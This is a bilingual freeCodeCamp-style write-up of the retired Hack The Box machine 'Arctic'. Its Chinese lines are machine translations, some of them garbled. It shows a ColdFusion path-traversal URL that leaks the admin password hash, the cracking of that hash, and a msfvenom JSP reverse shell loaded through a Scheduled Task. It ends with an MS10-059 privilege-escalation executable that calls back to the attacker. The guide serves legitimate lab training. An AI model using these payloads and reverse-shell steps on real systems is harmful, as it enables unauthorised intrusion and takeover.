打破冷漠僵局文章_保持冷静并打破僵局-北极

打破冷漠僵局文章

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一个在线平台，可让您测试渗透测试技能。 它包含一些不断更新的挑战。 其中一些模拟现实世界的场景，而另一些则更倾向于CTF的挑战风格。

Note. Only write-ups of retired HTB machines are allowed.

注意 。 只允许注销HTB机器。

Arctic is a beginner-level machine, however the load times on the web server pose a few challenges for exploitation. Basic troubleshooting is required to get the correct exploit functioning properly.

Arctic是初学者级别的机器，但是Web服务器上的加载时间给利用带来了一些挑战。 要使正确的漏洞利用程序正常运行，需要进行基本的故障排除。

We will use the following tools to pawn the box on a Kali Linux box

我们将使用以下工具将盒子当成Kali Linux盒子

• nmap
  纳帕
• Searchsploit
  Searchsploit
• hash-identifier
  哈希标识符
• MSFvenom
  MSF毒液
• netcat
  网猫
• GDSSecurity/Windows-Exploit-Suggester
  GDSSecurity / Windows-Exploit-Suggester
• python http server
  python http服务器
• powershell
  电源外壳

第1步-侦察 (Step 1 - Reconnaissance)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

开发机器之前的第一步是进行一些扫描和侦察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you could.

这是最重要的部分之一，因为它将决定您以后可以尝试利用的内容。 最好在该阶段花费更多的时间以获取尽可能多的信息。

端口扫描 (Ports scanning)

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我将使用Nmap(网络映射器)。 Nmap是一个免费的开源实用程序，用于网络发现和安全审核。 它使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用许多命令来扫描网络。 如果您想了解更多信息，可以在这里查看文档。

I use the following command to perform an intensive scan:

我使用以下命令执行密集扫描：

nmap -A -v 10.10.10.11

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：启用操作系统检测，版本检测，脚本扫描和跟踪路由

-v: Increase verbosity level

-v：提高详细程度

10.10.10.11: IP address of the Arctic box

10.10.10.11：北极箱的IP地址

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

如果发现结果有点不堪重负，则可以执行另一个命令以仅获取打开的端口。

nmap 10.10.10.11

We can see that there are 3 open ports:

我们可以看到有3个开放端口：

Port 135. Microsoft EPMAP (End Point Mapper), also known as DCE/RPC Locator service, used to remotely manage services including DHCP server, DNS server and WINS

端口 135 。 Microsoft EPMAP(端点映射器)，也称为DCE / RPC定位器服务，用于远程管理服务，包括DHCP服务器，DNS服务器和WINS

Port 8500. Adobe ColdFusion built-in web server

端口 8500 。 Adobe ColdFusion内置Web服务器

Port 49154. Certificate Management over CMS

端口 49154 。 CMS上的证书管理

For now, Adobe ColdFusion, which is running on port 8500, will be the primary target.

目前，在端口8500上运行的Adobe ColdFusion将成为主要目标。

第2步-枚举 (Step 2 - Enumeration)

Let's try the port 8500 and visit http://10.10.10.11:8500

让我们尝试端口8500并访问http://10.10.10.11:8500

We can see two folders. I open the CFIDE folder.

我们可以看到两个文件夹。 我打开CFIDE文件夹。

It seems to be a web application with a ColdFusion administration panel at the following address:

它似乎是一个带有ColdFusion管理面板的Web应用程序，位于以下地址：

10.10.10.11:8500/CFIDE/administrator/

For more information on ColdFusion, check here.

有关ColdFusion的更多信息，请单击此处 。

I use Searchsploit to check if there is any known vulnerability on ColdFusion. Searchsploit is a command line search tool for Exploit Database.

我使用Searchsploit检查ColdFusion上是否存在任何已知漏洞。 Searchsploit是Exploit Database的命令行搜索工具。

I use the following command:

我使用以下命令：

searchsploit coldfusion

We can also find the exploit on the Exploit Database website:

我们还可以在漏洞利用数据库网站上找到该漏洞利用：

I have a look at the description of the exploit:

我看一下漏洞利用的描述：

And replace the server bit by 10.10.10.11:8500

并将服务器位替换为10.10.10.11:8500

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

I can see that the hashed password is now visible on the page in between the inputs:

我可以看到哈希密码现在在输入之间的页面上可见：

I use hash-identifier to identify the possible hash. hash-identifier is a software to identify the different types of hashes used to encrypt data and especially passwords. You can find more information here.

我使用哈希标识符来识别可能的哈希。 哈希标识符是一种用于识别用于加密数据(尤其是密码)的不同类型哈希的软件。 您可以在此处找到更多信息。

I launch hash-identifier with the following command:

我使用以下命令启动哈希标识符：

hash-identifier

and copy/paste the hashed password I got earlier:

并复制/粘贴我之前获得的哈希密码：

We see the hash is most likely to be a SHA-1.

我们看到哈希很可能是SHA-1。

第3步-使用hashtoolkit.com破解SHA 1 (Step 3 - Crack SHA 1 with hashtoolkit.com)

I go to the website hashtoolkit to 'unhash' the hash. Hash functions are built in a way that it's very easy to generate a hash / fingerprint for a text, but almost impossible to decode the hash back to the original text.

我去网站hashtoolkit来“散列”散列。 哈希函数的构建方式很容易为文本生成哈希/指纹，但几乎不可能将哈希解码回原始文本。

It is important to note that hashing is a one way mechanism. Thus the data that was hashed can not be reversed practically or be "unhashed".

重要的是要注意，哈希是一种单向机制。 因此，散列的数据实际上无法逆转或“未散列”。

The website is using rainbow tables for reversing cryptographic hash functions, usually for cracking password hashes. More info on the rainbow tables here.

该网站正在使用Rainbow表来反转加密哈希函数，通常用于破解密码哈希 。 有关彩虹表的更多信息，请参见此处 。

I copy/paste the hash and got the password back: happyday.

我复制/粘贴哈希值，并找回密码： happyday。

You can also see the different hash for this same password:

您还可以看到相同密码的不同哈希值：

Currently the website has almost 17 billion decrypted MD5 and SHA1 password hashes:

当前，该网站拥有将近170亿个解密的MD5和SHA1密码哈希：

第4步-创建计划任务 (Step 4 - Create a Scheduled Task)

I use the password to log into the portal:

我使用密码登录门户网站：

I can see an area on the left sidebar that should allow uploads via Scheduled Tasks under the Debugging & Logging category:

我可以在左侧栏中看到一个区域，该区域应允许通过“计划和任务”在“调试和记录”类别下进行上传：

I can create a new task:

我可以创建一个新任务：

On the page, I will have to set up the task with the different parameters:

在页面上，我将不得不使用不同的参数来设置任务：

I check the Mappings to see the CFIDE path - one of the two folders we found at the beginning - and know where I can save the shell:

我检查了映射以查看CFIDE路径-我们在开始时找到的两个文件夹之一-并知道可以在哪里保存外壳程序：

I will use msfvenom, which is a payload generator, to craft the exploit - and more specifically a jsp reverse shell. This piece of information has been collected during recon phase - looking at the wikipedia page of ColdFusion, we can see it is written in Java:

我将使用有效负载生成器msfvenom来制作漏洞利用程序-更具体地说是jsp反向外壳程序。 这条信息是在侦查阶段收集的-查看ColdFusion的维基百科页面，我们可以看到它是用Java编写的：

You can learn more about msfvenom here.

您可以在此处了解有关msfvenom的更多信息。

I use the following command to create the payload:

我使用以下命令创建有效负载：

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.51 LPORT=443 -f raw > arcticshell.jsp

-p: Payload to use

- P：有效载荷来使用

-f: Output format

- F：输出格式

LHOST: Local host

LHOST ：本地主机

LPORT: Local port

LPORT ：本地端口

I saved the exploit as arcticshell.jsp. I can see the content of the payload with the following command:

我将漏洞利用保存为arcticshell.jsp 。 我可以使用以下命令查看有效内容：

cat arcticshell.jsp

Let's fire up a Python server to serve the file from Kali. I will use the SimpleHTTPServer. The SimpleHTTPServer module that comes with Python is a simple HTTP server that provides standard GET and HEAD request handlers. You can learn more on that here.

让我们启动一个Python服务器来从Kali提供文件。 我将使用SimpleHTTPServer 。 Python随附的SimpleHTTPServer模块是提供标准GET和HEAD请求处理程序的简单HTTP服务器。 您可以在此处了解更多信息 。

I use the following command to create a simple server:

我使用以下命令创建一个简单的服务器：

python -m SimpleHTTPServer 80

Back to the ColdFusion panel, I configure the following parameters for the Scheduled Task.

返回ColdFusion面板，为“计划任务”配置以下参数。

First I set up the URL to our webserver which is hosting the shell we created with msfvenom:

首先，我设置到Web服务器的URL，该Web服务器托管使用msfvenom创建的shell：

http://10.10.14.51/arcticshell.jsp

Then I check the box to save the output to a file.

然后，我选中复选框以将输出保存到文件。

Finally I set the file to the following path:

最后，我将文件设置为以下路径：

C:\ColdFusion8\wwwroot\CFIDE\arcticshell.jsp

Here is what I have when finishing setting all the parameters:

这是完成所有参数设置后的内容：

Under the Actions on the left side, I click on the first button to run the task. I can see a green message at the top of the page to let me know the scheduled task was completed successfully:

在左侧的“动作”下，单击第一个按钮以运行任务。 我可以在页面顶部看到一条绿色消息，通知我计划任务已成功完成：

I can also see a 200 response on my python http server:

我还可以在python http服务器上看到200响应：

I set up a Ncat listener on port 443 to catch the reverse shell connection.

我在端口443上设置了Ncat侦听器，以捕获反向Shell连接。

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users.

Ncat是一个功能丰富的联网实用程序，可从命令行跨网络读取和写入数据。 Ncat是为Nmap项目编写的，是对久负盛名的Netcat的重新改进。 它同时使用TCP和UDP进行通信，并且被设计为可靠的后端工具，可以立即为其他应用程序和用户提供网络连接。

You can learn more about Ncat here.

您可以在此处了解有关Ncat的更多信息。

I then browse to the shell at:

然后，我浏览以下位置的外壳：

http://10.10.10.11:8500/CFIDE/arcticshell.jsp

I finally got a shell!

我终于有了壳！

步骤5-寻找user.txt标志 (Step 5 - Looking for the user.txt flag)

I check who I am on the machine with the command

我使用以下命令检查我在机器上的身份

whoami

I list the files/folders with

我列出了文件/文件夹

dir

I navigate to Users

我导航到用户

Then I move to the tolis folder

然后我移到tolis文件夹

I navigate to the Desktop

我导航到桌面

And I find the user.txt file!

我找到了user.txt文件！

To read the content of the file I use the command

要读取文件的内容，请使用以下命令

more user.txt

第6步- 使用 GDSSecurity / Windows-Exploit-Suggester (Step 6 - Using GDSSecurity/Windows-Exploit-Suggester)

I look at the system information with the command

我用命令查看系统信息

systeminfo

I copy/paste the findings on a systeminfo.txt file:

我将发现的结果复制/粘贴到systeminfo.txt文件中：

I will use Windows-Exploit-Suggester from GDSSecurity:

我将使用GDSSecurity的 Windows-Exploit-Suggester：

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

此工具将目标补丁程序级别与Microsoft漏洞数据库进行比较，以检测目标上可能缺少的补丁程序。 它还会通知用户是否有可用于丢失公告的公用漏洞利用程序和Metasploit模块。

It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.

它需要Windows主机的“ systeminfo”命令输出，以便比较Microsoft安全公告数据库并确定主机的补丁程序级别。

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

它具有使用--update标志从Microsoft自动下载安全公告数据库的功能，并将其另存为Excel电子表格。

I copy/paste the raw windows-exploit-suggester python script on a file and then modify the file

我将原始的windows-exploit-suggester python脚本复制/粘贴到文件上，然后修改该文件

nano windows-exploit-suggester.py

to paste the code from the GitHub repository. We now have our 2 files into the same folder, systeminfo.txt and windows-exploit-suggester.py:

从GitHub仓库粘贴代码。 现在，我们将2个文件放到同一文件夹中，即systeminfo.txt和windows-exploit-suggester.py：

I can find out more about this tool with the following command:

我可以使用以下命令找到有关此工具的更多信息：

python windows-exploit-suggester.py -h

I update the database of the tool with the following command:

我使用以下命令更新该工具的数据库：

python windows-exploit-suggester.py --update

I run the script with

我运行脚本

python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2020-02-25-mssb.xls

If you run into an error, you will need to install pip before install xlrd. You can install pip on Kali with the following command:

如果遇到一个错误，你将需要安装PIP之前安装xlrd。 您可以使用以下命令在Kali上安装pip：

apt install python-pip

Then you can install wlrd with the command

然后您可以使用以下命令安装wlrd

pip install xlrd

I can see that there are several missing CVEs on this machine. I will target the MS10-059 vulnerability:

我可以看到这台计算机上缺少几个CVE。 我将针对MS10-059漏洞：

步骤7- 执行特权升级 (Step 7 - Performing privilege escalation)

I look at the Microsoft website to get more information from their Security Bulletin:

我查看Microsoft网站，以从其安全公告中获取更多信息：

I have a look at the Exploit Database:

我看一下漏洞利用数据库：

I also have a look at the National Vulnerability Database. More info on NVD here.

我还查看了国家漏洞数据库。 有关NVD的更多信息，请点击此处 。

I find an executable on GitHub here that I can download. The exploit will create a reverse shell.

我发现在GitHub上的可执行文件在这里 ，我可以下载。 该漏洞将创建一个反向外壳。

I create a new python http server with

我用创建一个新的python http服务器

python -m SimpleHTTPServer 80

Back to the shell where I got the user flag, I set up a webclient with the URL of the exploit and the file where the exploit will be saved:

回到获得用户标志的外壳程序中，我使用漏洞利用程序的URL和将保存漏洞利用程序的文件设置了一个webclient：

I'm getting a 200 on the python http server:

我在python http服务器上得到200：

I set up a new netcat and launch the exploit with the following command:

我设置了一个新的netcat并使用以下命令启动漏洞利用程序：

exploit.exe 10.10.14.20 443

步骤8-寻找root.txt标志 (Step 8 - Looking for the root.txt flag)

I can see that the privilege escalation was a success by checking who I am on the machine:

通过检查我在计算机上的身份，我可以看到特权升级成功：

whoami

It returns

它返回

nt authority\system

I am admin:

我是管理员：

I navigate to Users:

我导航到用户：

I move to the Administrator folder:

我移至管理员文件夹：

I navigate to the Desktop folder:

我导航到桌面文件夹：

I can see the root.txt flag!

我可以看到root.txt标志！

I use the following command to see the content of the file:

我使用以下命令查看文件的内容：

more root.txt

Congrats! You found both flags!

恭喜！ 您找到了两个标志！

Please don’t hesitate to comment, ask questions or share with your friends :)

请不要犹豫，发表评论，提问或与您的朋友分享:)

You can see more of my articles here

您可以在这里看到更多我的文章

You can follow me on Twitter or on LinkedIn

您可以在Twitter或LinkedIn上关注我

And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘记＃ GetSecure ，＃ BeSecure和＃StaySecure ！

Other Hack The Box articles

其他Hack The Box文章

• Keep Calm and Hack The Box - Lame

  保持冷静并砍箱子-me脚

• Keep Calm and Hack The Box - Legacy

  保持冷静并打破常规-旧版

• Keep Calm and Hack The Box - Devel

  保持冷静并打破僵局-开发

• Keep Calm and Hack The Box - Beep

  保持冷静并砍箱子-哔

• Keep Calm and Hack The Box - Optimum

  保持冷静并打破僵局-最佳

翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-arctic/

打破冷漠僵局文章